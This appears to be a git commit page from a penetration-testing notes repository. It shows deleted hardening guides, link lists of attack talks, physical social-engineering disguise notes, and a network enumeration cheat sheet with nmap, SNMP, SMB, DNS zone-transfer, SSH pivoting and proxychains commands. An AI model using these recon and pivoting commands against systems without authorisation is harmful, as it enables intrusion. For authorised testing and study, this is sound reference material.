
Changed structure

Robert 7 years ago
183 changed files with 32 additions and 1770 deletions
  1. +4  Draft/Draft/Anonymity Opsec
  2. +0
  3. +0
  4. +0
  5. +0  Draft/Draft/Basic Security
  6. +0  Draft/Draft/Building A Pentest
  7. +0  Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
  8. +0  Draft/Draft/CTFs &
  9. +0  Draft/Draft/Cheat sheets reference
  10. +0  Draft/Draft/Client Side
  11. +0  Draft/Draft/Common CLI CMD Refs.rtf
  12. +0  Draft/Draft/Common CLI CMD Refs/Curl.txt
  13. +0  Draft/Draft/Common CLI CMD Refs/Metasploit.txt
  14. +0  Draft/Draft/Common CLI CMD Refs/Ncat.txt
  15. +0  Draft/Draft/Common CLI CMD Refs/Nmap.txt
  16. +0  Draft/Draft/Common CLI CMD Refs/TCPDump.txt
  17. +0  Draft/Draft/Common CLI CMD Refs/ToDO.txt
  18. +0  Draft/Draft/Computer Hardware
  19. +0  Draft/Draft/Con Videos
  20. +0
  21. +0
  22. +0  Draft/Draft/Cryptography &
  23. +0  Draft/Draft/Cryptography & Encryption/Linux Systems.txt
  24. +0  Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  25. +0  Draft/Draft/Cryptography & Encryption/cull.txt
  26. +0
  27. +0
  28. +0
  29. +0
  30. +0
  31. +0  Draft/Draft/Documentation &
  32. +0
  33. +0
  34. +0  Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Desktop.txt
  35. +0  Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Server.txt
  36. +0  Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows.rtf
  37. +0  Draft/Draft/Draft/Securing Hardening/Securing iOS/List of Hardening Guides for iOS.txt
  38. +0  Draft/Draft/Draft/Securing Hardening/Securing iOS/Securing iOS.rtf
  39. +0
  40. +0
  41. +0  Draft/Draft/Draft/Software Defined Radio/Dongles.txt
  42. +0  Draft/Draft/Draft/Software Defined Radio/Software Defined Radio SDR.txt
  43. +0  Draft/Draft/Draft/Software Defined Radio/Software Defined Radio.rtf
  44. +0  Draft/Draft/Draft/Steal Everything Kill Everyone
  45. +0
  46. +0
  47. +0  Draft/Draft/Draft/System Internals Windows and Linux Internals
  48. +0
  49. +0  Draft/Draft/Draft/To Do/4.txt
  50. +0  Draft/Draft/Draft/To Do/Sections that Need Eyes.txt
  51. +0  Draft/Draft/Draft/To Do/To Do.rtf
  52. +0  Draft/Draft/Draft/To Do/add cull -1.txt
  53. +0
  54. +0  Draft/Draft/Draft/UX Design - Because we all know how sexy pgp
  55. +0  Draft/Draft/Draft/Various purpiose based OS'
  56. +0  Draft/Draft/Draft/Web Applications/Add.txt
  57. +0  Draft/Draft/Draft/Web Applications/Bypassing WAFs.txt
  58. +0  Draft/Draft/Draft/Web Applications/Cheat Sheet.txt
  59. +0  Draft/Draft/Draft/Web Applications/Cull integrate.txt
  60. +0  Draft/Draft/Draft/Web Applications/Drupal.txt
  61. +0  Draft/Draft/Draft/Web Applications/General Tips Trick.txt
  62. +0  Draft/Draft/Draft/Web Applications/HTML5.txt
  63. +0  Draft/Draft/Draft/Web Applications/Joomla.txt
  64. +0  Draft/Draft/Draft/Web Applications/LFI RFI Local File Inclusion.txt
  65. +0  Draft/Draft/Draft/Web Applications/Meta.rtf
  66. +0  Draft/Draft/Draft/Web Applications/NO SQL Injection.txt
  67. +0  Draft/Draft/Draft/Web Applications/SQLMap Cheat Sheet.txt
  68. +0  Draft/Draft/Draft/Web Applications/Securing Web Applications.txt
  69. +0  Draft/Draft/Draft/Web Applications/Tools/Brute Force Tools.txt
  70. +0  Draft/Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt
  71. +0  Draft/Draft/Draft/Web Applications/Tools/Meta.txt
  72. +0  Draft/Draft/Draft/Web Applications/Tools/SQL Injection.rtf
  73. +0  Draft/Draft/Draft/Web Applications/Tools/Scanners.txt
  74. +0  Draft/Draft/Draft/Web Applications/Tools/Tools.rtf
  75. +0  Draft/Draft/Draft/Web Applications/Tools/WebShells.txt
  76. +0  Draft/Draft/Draft/Web Applications/Web Applications.rtf
  77. +0  Draft/Draft/Draft/Web Applications/Wordpress.txt
  78. +0  Draft/Draft/Draft/Web Applications/sqli cheat.txt
  79. +0
  80. +0  Draft/Draft/Embedded Device
  81. +0  Draft/Draft/Exploit Development/Anti-Fuzzing.txt
  82. +0  Draft/Draft/Exploit Development/Assembly.txt
  83. +0  Draft/Draft/Exploit Development/Cull.txt
  84. +0  Draft/Draft/Exploit Development/Exploit Development.rtf
  85. +0  Draft/Draft/Exploit Development/Exploit Development.txt
  86. +0  Draft/Draft/Exploit Development/Exploit Development_1.rtf
  87. +0  Draft/Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
  88. +0  Draft/Draft/Exploit Development/MSF Framework Reference.rtf
  89. +0  Draft/Draft/Exploit Development/Papers Tutorials Walk Throughs.txt
  90. +0  Draft/Draft/Exploit Development/Writeups.txt
  91. +0
  92. +0  Draft/Draft/Forensics/Anti-Forensics & Anti-Anti-Forensics – Michael.txt
  93. +0  Draft/Draft/Forensics/add cull.txt
  94. +0
  95. +0  Draft/Draft/Frameworks/Metasploit Reference.txt
  96. +0  Draft/Draft/Frameworks/Meterpreter Scripts and Description.txt
  97. +0  Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  98. +0  Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Enumeration.txt
  99. +0  Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  100. +0  Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf

Draft/Draft/Draft/ → Draft/Draft/Anonymity Opsec View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Attacking → Draft/Draft/Attacking View File

Draft/Draft/Draft/Attacking → Draft/Draft/Attacking View File

Draft/Draft/Draft/Basic Security → Draft/Draft/Basic Security View File

Draft/Draft/Draft/Building A Pentest → Draft/Draft/Building A Pentest View File

Draft/Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt View File

Draft/Draft/Draft/CTFs & → Draft/Draft/CTFs & View File

Draft/Draft/Draft/Cheat sheets reference → Draft/Draft/Cheat sheets reference View File

Draft/Draft/Draft/Client Side → Draft/Draft/Client Side View File

Draft/Draft/Draft/Common CLI CMD Refs.rtf → Draft/Draft/Common CLI CMD Refs.rtf View File

Draft/Draft/Draft/Common CLI CMD Refs/Curl.txt → Draft/Draft/Common CLI CMD Refs/Curl.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Metasploit.txt → Draft/Draft/Common CLI CMD Refs/Metasploit.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Ncat.txt → Draft/Draft/Common CLI CMD Refs/Ncat.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Nmap.txt → Draft/Draft/Common CLI CMD Refs/Nmap.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/TCPDump.txt → Draft/Draft/Common CLI CMD Refs/TCPDump.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/ToDO.txt → Draft/Draft/Common CLI CMD Refs/ToDO.txt View File

Draft/Draft/Draft/Computer Hardware → Draft/Draft/Computer Hardware View File

Draft/Draft/Draft/Con Videos → Draft/Draft/Con Videos View File

Draft/Draft/Draft/Counter → Draft/Draft/Counter View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Cryptography & → Draft/Draft/Cryptography & View File

Draft/Draft/Draft/Cryptography & Encryption/Linux Systems.txt → Draft/Draft/Cryptography & Encryption/Linux Systems.txt View File

Draft/Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt → Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt View File

Draft/Draft/Draft/Cryptography & Encryption/cull.txt → Draft/Draft/Cryptography & Encryption/cull.txt View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Data → Draft/Draft/Data View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Documentation & → Draft/Draft/Documentation & View File

Draft/Draft/Draft/Draft.rtf → Draft/Draft/Draft.rtf View File

+ 0
- 12
Draft/Draft/Draft/ View File

@ -1,12 +0,0 @@
Lockingpicking sites:
[Newbies guide to picking safes](
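Review bot: this hunk removes the file outright (+ 0 / - 12) while the commit message says only "Changed structure" and the rest of the commit is renames from Draft/Draft/Draft/ into Draft/Draft/; no rename target for this file appears anywhere on the page, so confirm the lockpicking notes were relocated rather than lost before merging. Minor: "Lockingpicking sites:" on the first line should read "Lockpicking sites:", and the "[Newbies guide to picking safes](" link has an empty target.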

+ 0
- 97
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Desktop.txt View File

@ -1,97 +0,0 @@
Who is the target audience for this?
The intended target audience for the following information is not anyone trying to escape an oppressive regime or someone trying to avoid compromise from a nation-state entity.
It is intended as a guide for the lowest common denominator. I’m not going to write out a super long/secure guide only to have ten people use it. If you’re looking for a more effective hardening guide for windows, please check out these links:
Hardening Windows 7:
Hardening Windows 8:
Center for Internet Security(CIS) Guides to System Hardening:
With that said, most issues can be avoided through keeping your system up to date with Windows Update Services, not installing software from unknown locations, and not installing Flash or Java unless you must.
Securing Windows Desktop
Make sure your system has the latest updates and patches available through Windows Update Service.
Create a baseline configuration.
I advise that you create a security baseline once you have applied the latest patches and updates. This allows you to have a point of reference to work from. From this, you can start planning on what specific techniques you will use to harden your system.
Microsoft Baseline Security Analyzer Tool
Install the Exploit Mitigation Enhancement Toolkit.
It is recommended you install the Exploit Mitigation Enhancement Toolkit provided at no cost by Microsoft. It is a piece of software that reduces the effectiveness of exploits used by malware through various mitigation techniques. More information can be found here:
EMET Tutorial on installation/configuration
EMET Homepage:
Download link(EMET 5.0):
Windows Firewall
Windows firewall is enabled by default
By default it is set to implicit deny on incoming packets, and implicit allow for outgoing packets.
For a guide on configuring Windows firewall, check out Microsoft’s guide:
Also, Windows Firewall configuration through Powershell
AV. I will go on record, as saying that I do recommend some form of Anti-Virus. As for which one in particular, I will not say. I will however provide a link to comparisons of various AV:
Web Browser
If you really need to be told what Firefox is, I don’t even.
Firefox Plugins
One of the beautiful things Firefox are the plugins, and the extra functionality added through them. The list below is my recommendations for securing your browser as well as controlling what information it sends out.
Adblock - Blocks ads. Ads are a large vector of attack due to the lack of verification within the advertising industry.
Noscript - Allows for granular control of Javascript on pages.
Request Policy - Control the HTTP requests made by your browser to 3rd party websites.
Self destructing cookies - Prevent tracking and abuse of session information.
HTTPS Everywhere - Forces sites when possible to use HTTPS encryption.
Analyzing the Attack Surface(Only on Win7/Serv08 and below)
Release Announcement/Download:
Using the Attack Surface Analyzer:
Attack Surface Analyzer is a Microsoft verification tool designed to catalog changes in system state, runtime parameters, and securable objects on the Windows operating system. This analysis helps identify any increase in the attack surface that is caused by installing applications. Developed by the Security Engineering group team, Attack Surface Analyzer is the first tool of its kind available for public use, and it runs on the Windows Vista, Windows 7, and Windows Server 2008 operating systems.
Check the Encryption section of the overall guide for more information.
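Review bot: every resource reference in this hunk ("Hardening Windows 7:", "Hardening Windows 8:", "Center for Internet Security(CIS) Guides to System Hardening:", "EMET Homepage:", "Download link(EMET 5.0):", "Release Announcement/Download:", "Using the Attack Surface Analyzer:") ends at the colon with no URL, so none of the guides the text defers to can be followed from this revision; if the file is being relocated, restore the links at the destination or drop the empty headings. The section headings ("Windows Firewall", "Web Browser", "Firefox Plugins") are also indistinguishable from body text, so the plugin recommendations and the firewall default description ("implicit deny on incoming packets, and implicit allow for outgoing packets") would read better as list items under marked headings. Note also that the Attack Surface Analyzer paragraph itself restricts the tool to Vista, 7 and Server 2008, which matches the "(Only on Win7/Serv08 and below)" qualifier in the heading; keep that qualifier if the guide moves.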

+ 0
- 28
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Server.txt View File

@ -1,28 +0,0 @@
Hardening Windows Server
Firstly, if you are reading this hoping to learn how to harden production servers, stop what you’re doing, walk on over to HR, and hand in your notice.
For anyone who *isn’t* trying to harden production servers, please read this:
In, fact, even if you don’t, you should still read it. It lists several common gotchas that plague people new to hardening.
Having read that, here is Microsoft’s Security Compliance Manager wiki:
It supports Windows 7, Vista, Server 2008 and Server 2012.
Keep in mind that any server hardening should be custom tailored to your operation and environment. You can’t simply take a one-size fits all approach.
Some Links:
Server Baseline hardening:
Server 2008 Hardening Checklist:
Hardening Server 08 from Microsoft:
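Review bot: same missing-URL problem as the desktop guide: "please read this:", "here is Microsoft's Security Compliance Manager wiki:" and the three entries under "Some Links:" all end with nothing after the colon, so the hunk's advice to read those resources cannot be acted on. "In, fact, even if you don't" has a stray comma, and the "Some Links:" block would read better as a list. The substantive caveat ("any server hardening should be custom tailored to your operation and environment") is the only part of the file that survives without a link and is worth keeping wherever this content lands.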

+ 0
- 0
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows.rtf View File

+ 0
- 20
Draft/Draft/Draft/Securing Hardening/Securing iOS/List of Hardening Guides for iOS.txt View File

@ -1,20 +0,0 @@
List of Hardening Guides for iOS
Excellent forum post detailing general security practices:
Apple’s white paper on their security mechanisms built into iOS:
University of Texas’s Checklist/Guide to securing iOS:
Center for Internet Security Guide to securing iOS 7:
Australian Signals Intel Guide to securing iOS 7:
Excellent forum post detailing general security practices:
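Review bot: the first and last lines of this list are the same entry ("Excellent forum post detailing general security practices:"), so one of them should be dropped. As with the other hardening files in this commit, every entry ends at the colon with no URL, so the list carries no usable references in this revision; restore them at the destination or the file is just a list of titles.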

+ 0
- 0
Draft/Draft/Draft/Securing Hardening/Securing iOS/Securing iOS.rtf View File

+ 0
- 8
Draft/Draft/Draft/ View File

@ -1,8 +0,0 @@
* Summary: Shadow is a unique, open source discrete-event network simulator that runs real applications like Tor. Shadow combines the accuracy of emulation with the efficiency and control of simulation, achieving the best of both approaches
* Data Analysis System

+ 0
- 87
Draft/Draft/Draft/Social View File

@ -1,87 +0,0 @@
Social Engineering
[DiSC Overview](
* DiSC is a personal assessment tool used to improve work productivity, teamwork and communication. DiSC is non-judgmental and helps people discuss their behavioral differences.
DEF CON 22 Hacking Conference Presentation By Chris Hadnagy - What Your Body Tells Me - Body Language for the SE - Video and Slides.m4v
Research Papers
[Construal-Level Theory of Psychological Distance](
* Abstract: People are capable of thinking about the future, the past, remote locations, another person’s perspective, and counterfactual alternatives. Without denying the uniqueness of each process, it is proposed that they constitute different forms of traversing psychological distance. Psychological distance is egocentric: Its reference point is the self in the here and now, and the different ways in which an object might be removed from that point—in time, in space, in social distance, and in hypotheticality—constitute different distance dimensions. Transcending the self in the here and now entails mental construal, and the farther removed an object is from direct experience, the higher (more abstract) the level of construal of that object. Supporting this analysis, research shows (a) that the various distances are cognitively related to each other, (b) that they similarly influence and are influenced by level of mental construal, and (c) that they similarly affect prediction, preference, and action.
Books, Articles & Presentations
Source Gathering:
Art of Deception
Art of the Steal
Craft of Intelligence
Miss Manners guide to proper manners
Social Engineering: Art of Human Hacking
What EveryBODY is saying
Toastmaster's guide to body language
[Disguise - Appearance Hacking](
My notes from it: Why use makeup?
Blend into crow
Pose as employee/vendor
Regain access if caught
Create distraction for teammates
Whom to disguise as?
Sales Executive
Interview Candidate
Easy to see goings on
Sidewalk Sleeper
Transform into another person:
Can take minutes/hours
Examine each physical attribute
Some modified easier than others
Entire appearance makes the difference. One part is off, whole cover can be blown
If using hardhat, make sure to beat the shit out of it. Add stickers.
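Review bot: "Blend into crow" in the notes block should read "Blend into crowd". All markdown links in this hunk ("[DiSC Overview](", "[Construal-Level Theory of Psychological Distance](", "[Disguise - Appearance Hacking](") have empty targets, so only the link text survives; the "Source Gathering:" book list and the "My notes from it:" block also need list markers to be readable once rendered.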

+ 0
- 5
Draft/Draft/Draft/Software Defined Radio/Dongles.txt View File

@ -1,5 +0,0 @@
FunCube dongle

+ 0
- 15
Draft/Draft/Draft/Software Defined Radio/Software Defined Radio SDR.txt View File

@ -1,15 +0,0 @@
Software Defined Radio
So you want to get into SDR talk

+ 0
- 0
Draft/Draft/Draft/Software Defined Radio/Software Defined Radio.rtf View File

+ 0
- 50
Draft/Draft/Draft/Steal Everything Kill Everyone View File

@ -1,50 +0,0 @@
##Steal Everything; Kill Everyone; Profit!
###j/k please don’t :3
####[Too Many Cooks; Exploiting the Internet of Tr-069](
####[Ever wanted to scan the internet in a few hours?](
####[The Eavesdropper’s Dillemma](
####Coding Malware for fun and no profit
* [Git Page](
* [TinyXPB-Winxp Bootkit](
* [Writing Malware for fun but not profit](
####[Use google bots to perform SQL injections on websites](
####[Device Pharmer](
####[Door Control Systems: An Examination of Lines of Attack](
####[Implanting a Dropcam](
####[Breaking IPMI/BMC](
####[Achilles Heel of the American Banking System](
####[Different Type of SCADA](
####[Attacking *multifunction* printers and getting creds from them](
* Proof of Concept of SSH Botnet C&C Using Python
####[Weapons of Mass Distraction](
* In this talk, we aim to briefly cover the background of sock puppets (and related attacks) before moving on to real world demonstrations & “attacks“. Rigging polls, abusing Twitter, causing Reddit riots & targeting popular news organisations are some of the (many) attacks covered. In all these cases we discuss what we tried, what worked, what didn’t and what the implications are of the attacks. Where possible we will cover defences and solutions.
####[Adding your protocol to Masscan](

+ 0
- 0
Draft/Draft/Draft/SysAdmin/SysAdmin.rtf View File

+ 0
- 71
Draft/Draft/Draft/SysAdmin/Windows.txt View File

@ -1,71 +0,0 @@
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](
* Official MS paper.
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](
[Second section good resource for hardening windows](
[Windows ISV Software Security Defenses](
Delta Copy](
* In technical terms, DeltaCopy is a "Windows Friendly" wrapper around the Rsync program, currently maintained by Wayne Davison. "rsync" is primarily designed for Unix/Linux/BSD systems. Although ports are available for Windows, they typically require downloading Cygwin libraries and manual configuration.
[The 10 Windows group policy settings you need to get right](
[Windows Performance Toolkit Reference](
[Harden windows IP Stack](
[GPO Best Policies](
[Understanding DEP as a mitigation Technology](
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](
[Windows Firewall Hook Enumeration](
* We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
[15 Ways to bypass Powershell execution-policy settings](
* Does what it says on the tin. Overall, its clear that execution-policy was not meant as a security method. Or if it was, someone was drinking a bit too much.
Protecting against Pass-The-Hash and other techniques
Cached Domain Credentials
Mitigating Kerberos Golden Tickets:
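Review bot: "[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](" appears twice in this hunk (third link from the top and again after "[Understanding DEP as a mitigation Technology]("); drop one. "Delta Copy](" is missing its opening "[" and will not render as a link. The three trailing lines ("Protecting against Pass-The-Hash and other techniques", "Cached Domain Credentials", "Mitigating Kerberos Golden Tickets:") are headings with nothing beneath them, so they read as placeholders and should either get their entries or be removed.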

+ 0
- 95
Draft/Draft/Draft/System Internals Windows and Linux Internals View File

@ -1,95 +0,0 @@
[Linux Kernel Explanation/Walk through](
[Know your Windows Processes or Die Trying](
* Excellent quick reference on Windows proccesses with a focus on Win7. Good resource.
[Windows Program Automatic Startup Locations](
[Application Compatibility in Windows](
[Introduction to Windows Kernel Security](
[Technical Overview of Windows UEFI Startup Process](
[Windows 8 BOot](
[Windows 8 ASLR Explained](
[Collection of Windows Autostart locations](]
[Inside the Windows Vista Kernel: Part 1](
[How Control Flow Guard Drastically Caused Windows 8.1 Address Space and Behavior Changes](
[Pushing the Limits of Windows: Virtual Memory](
Linux References
[Memory Management: Paging](
[Linux Device Drivers book](
[X Window System Explained](
[Understanding the ELF](
[Linkers and Loaders - Book](
* These are the manuscript chapters for my Linkers and Loaders, published by Morgan-Kaufman. See the book's web site for ordering information.
* All chapters are online for free at the above site.
[ELF Format](
[Linker and Libraries](
Linux Filesystem infographic
* [Part 1](
* [Part 2](
[Anatomy of a program in memory](
* Writeup on the structure of program memory in Linux.
[How the Kernel manages Memory - Linux](
[Linux Documentation Project](
[Introduction to Linux - Machtelt Garrels](
* Excellent doc covering every aspect of linux. Deserves at least 1 skim through.
[Bash Guide for Beginners](
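Review bot: "[Collection of Windows Autostart locations](]" has a stray "]" after the closing parenthesis and will render broken; "[Windows 8 BOot](" has a capitalisation typo; "proccesses" should be "processes". The first entry "[Linux Kernel Explanation/Walk through](" sits above the Windows links although a "Linux References" heading exists further down, so move it there. The "Linux Filesystem infographic" entry is the only one with Part 1/Part 2 sub-items; the rest of the annotations ("* Excellent quick reference...", "* Writeup on the structure...") follow the same bullet style, so that is fine.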

+ 0
- 8
Draft/Draft/Draft/Threat View File

@ -1,8 +0,0 @@
Threat Modeling
Guerrilla Threat Modelling (or 'Threat Modeling' if you're American)`
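Review bot: the line "Guerrilla Threat Modelling (or 'Threat Modeling' if you're American)`" ends with a stray backtick, and neither line in this hunk carries a link, so in this revision the file is an empty heading; either the URL was lost on the way in or the entry was never completed.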

+ 0
- 198
Draft/Draft/Draft/To Do/4.txt View File

@ -1,198 +0,0 @@
Network Enumeration and Scanning Cheat sheet
Network Scanning and Mapping
Network Service Discovery
nmap -sSV -vv -PN --send-ip -A -O -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>nmap -A -vv -PN --send-ip -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>
Unicorn Scan
us -H -msf -Iv <address> -p 1-65535
us -H -mU -Iv <address> -p 1-65535
Layer 2 - Arp - netdiscover
netdiscover -i <interface> -r <address-range>
TCPDump Sniffing
tcpdump -s0 -xxXX -vv -i eth0 'host <address> and (dst port <num> or <num> )' | tee <address>_<service>_`date +%Y-%m-%d_%H:%M`.txt
or save the pcap file with additional flag (filename shortcut):
-w <address>_<service>_`date +%Y-%m-%d_%H:%M`.pcap
Locate VLAN Tagstcpdump -vv -i <interface> -s &ltsnap-length> -c <num-packet-count> 'ether[20:2] == 0x2000'
Specific Service Queries
DNS TCP and UDP 53 - DNS walking and Zone transfers
dig <domain> @<dns-server> AXFR | tee dns_<domain>_axfr._`date +%Y-%m-%d_%H:%M`.txt
DNS TCP and UDP 53 - DNS cache poisoning check
dig +short @<dns-server> txt
"<dns-server> is GREAT: 26 queries in 4.4 seconds from 26 ports with std dev 22336"
HTTP Web applications TCP 80,8000
nikto -h -p -C all -Display D -output nikto_<target-server><port>_`date +%Y-%m-%d_%H:%M`.txt -Format txt
cd /pentest/web/dirbuster && java -jar DirBuster-0.12.jar
WFuzz -c -z file,<wordlist> --hc 404 -o <html|magictree> http://<site-url>/FUZZ
./ -c -z file,/pentest/passwords/wordlists/combined --hc 404 -o html http://<site-url>/FUZZ 2> /dev/null
HTTP commands for webserver enumeration
nc <target-address> <port>
IIS 6.0
openssl s_client -connect <target-server>443 -state -debug
SSL_connect:before/connect initialization
... ... ... cut ... ... ...
SSL_connect:SSLv3 write client key exchange A
... ... ... cut ... ... ...
HTTP/1.1 302 Found
Date: Mon 02 Apr 2012 06:53:49 GMT
Server IBM_HTTP_Server/ Apache/2.0.47 (Unix)
... ... ... cut ... ... ...
SNMP commands UDP 161
snmpwalk -c public -v[1|2c] <target-server> | tee <address>_snmp_`date +%Y-%m-%d_%H:%M`.txt
SNMPv2-MIB::sysDescr.0 = STRING: hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (24030770) 2 days, 18:45:07.70
SNMPv2-MIB::sysContact.0 = STRING: System contact unknown at this time
SNMPv2-MIB::sysName.0 = STRING:
SNMPv2-MIB::sysLocation.0 = STRING: System location unknown at this time
SNMPv2-MIB::sysServices.0 = INTEGER: 72
... ... ...
/ public linux.txt
UPTIME... ... ...
HOSTNAME... ... ...
... ... ...
MOUNTPOINTS... ... ...
... ... ...
./onesixtyone -c <dictionary-file> -i <hosts-file> -o <address-range>_snmp_`date`.log -w
./onesixtyone <target-address>
Scanning 1 hosts, 2 communities [public] hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
./ -c <community-name> -v <version 1,2> -t <address-range> v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (
[*] Try to connect to
[*] Connected to
[*] Starting enumeration at 2011-07-25 10:32:58
[*] System information
Hostname :
Description : hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
Uptime system : 0.00 seconds
Uptime SNMP daemon : 2 days, 18:17:07.01
[*] Network information
... ... ...
[*] Network interfaces
... ... ...
[*] Routing information
... ... ...
[*] Listening TCP ports and connections
... ... ...
Samba/CIFS/NETBIOS TCP 135,139,445
nbtscan -v -s : -r <address-range> | tee <address-range>_nbtscan_`date +%Y-%m-%d_%H:%M`.txt
SMBClient - Discover and mount shares
smbclient -L \\\<target-address>\\ -U <Username>
smbclient -U <Username> -W <Workgroup> \\\\<target-address>\\\<sharename>
RPC, PortMapper and NFS TCP/UDP:111
rpcinfo -p >target-address> | tee <address>_rpcinfo_`date +%Y-%m-%d_%H:%M`.txt
showmount -e <ip-address>
mount <ip-address>:<exported_path> <local_path>
Tunnelling and Pivoting
SSH Tunnelling and pivoting
ssh -v -f -N -L <localIP>:<local-port>:<dest-ip>:<dest-port> <user>@&ltpivot-host> -i <authentication-key-file>
Verbosity (-v), Background (-f), No command execution (-N), Local port forwarding (-L)
Forward localhost port 25 to the localhost of using ssh DSA key
ssh -v -f -N -L user@ -i /dsa/1024/f1fb2162a02f0f7c40c210e6167f05ca-16858
Proxy Chains
Dual-honed proxies or for proxying some port-scans
Edit the configuration file:
Under the ProxyList section:
http <proxy-server-ip> <port>
Execute with:
proxychains &ltsocket-aware command>
proxychains nmap -sT -vv --send-ip -pT:21,22,25,80,443,445,3389 <target-address>
Posted 22nd February 2012 by Tim Arneaud
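Review bot: several lines in this hunk have been run together or carry raw HTML entities, which makes the commands wrong if copied verbatim: the "Network Service Discovery" line holds two nmap invocations on one line with no separator between the first command's trailing <address-range> and the second "nmap"; "Locate VLAN Tagstcpdump ..." fuses the heading with the command and contains "&ltsnap-length>"; the ssh pivoting line has "&ltpivot-host>" and the proxychains line "&ltsocket-aware command>"; "rpcinfo -p >target-address>" has a ">" where "<" is meant; the "nikto -h -p" line has lost its host and port values and the "ssh ... -L user@" example has lost the forward specification and host. The "Specific Service Queries" part also mixes commands with captured tool output (the s_client, snmpwalk, onesixtyone and snmpenum transcripts) with nothing to tell them apart, so mark output blocks distinctly. The source attribution on the last line ("Posted 22nd February 2012 by Tim Arneaud") should travel with the content.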

+ 0
- 76
Draft/Draft/Draft/To Do/Sections that Need Eyes.txt View File

@ -1,76 +0,0 @@
Android - Encryption
Android - Analyzing Attack Surface
Computer Hardware attacks - General
Con Videos - Add Defcon Archive; Shmoocon/Ruxcon/etc.
Counter Surveillance - Legit info
Crypto Currencies - In general
Crypto - General/form
Darknets - More than just reddit
Data Visualization - More in general
Disclosure - Some historical things
Forensics - Integrate from cull list
Fuzzing - Educational stuff; more writeups
Google Hacking - Completely empty
Honeypots - More
Lockpicking - needs fucks
Logging - More for all
Malware - Structure, clean out cull
Network Attacks and Defense - Structure, clean out cull, add more
Recon - Structure/more/cull
OSINT - Structure/clean out cull
Passwords - Clean out cull/structure/more
Phishing Under Client Side Attacks
Persistence - Needs some lovin
Programming - Some stuff
Pwning Skiddies - meh/Needs more
Reverse Engineering - Structure/clean out cull/more
Rootkits - Needs more/Structure
Securing & Hardening - Structure/simplify
Social Engineering - Could do with a touch up
SDR - needs work
SysInternals - Always use more
Tor - Needs mo
Threat Modeling - Needs more
UX/Design - Could do with a few more links
Sysadmin - Always more
WebApp - Structure/cleanup/clear out cull
Wireless Networks - More info/structure

+ 0
- 0
Draft/Draft/Draft/To Do/To Do.rtf View File

+ 0
- 101
Draft/Draft/Draft/To Do/add cull -1.txt View File

@ -1,101 +0,0 @@
Elaborate on packers
[Thousands of MongoDB installations on the net unprotected](
[Windows 8 Security and ARM](
APK File Infection on an Android System - DEFCON;list=PLCDA5DF85AD6B4ABD
Unmasking Careto through Memory Analysis - Andrew Case
PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
Cull the interesting papers
[Android-x86 Project - Run Android on Your PC](
* This is a project to port Android open source project to x86 platform, formerly known as "patch hosting for android x86 support". The original plan is to host different patches for android x86 support from open source community. A few months after we created the project, we found out that we could do much more than just hosting patches. So we decide to create our code base to provide support on different x86 platforms, and set up a git server to host it.
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications.
Check under research section
Go through
Compare resources against what power-view can grab
Compare against sysmon service for scaling, setting it as service with scripting
Shellshock bug writeup by lcamtuf
[Access control best practices](

+ 0
- 15
Draft/Draft/Draft/ View File

@ -1,15 +0,0 @@
Site list: (NO CP)
Tor Search Engine

+ 0
- 11
Draft/Draft/Draft/UX Design - Because we all know how sexy pgp View File

@ -1,11 +0,0 @@
[Nielsen Norman Group](
* Evidence-Based User Experience Research, Training, and Consulting
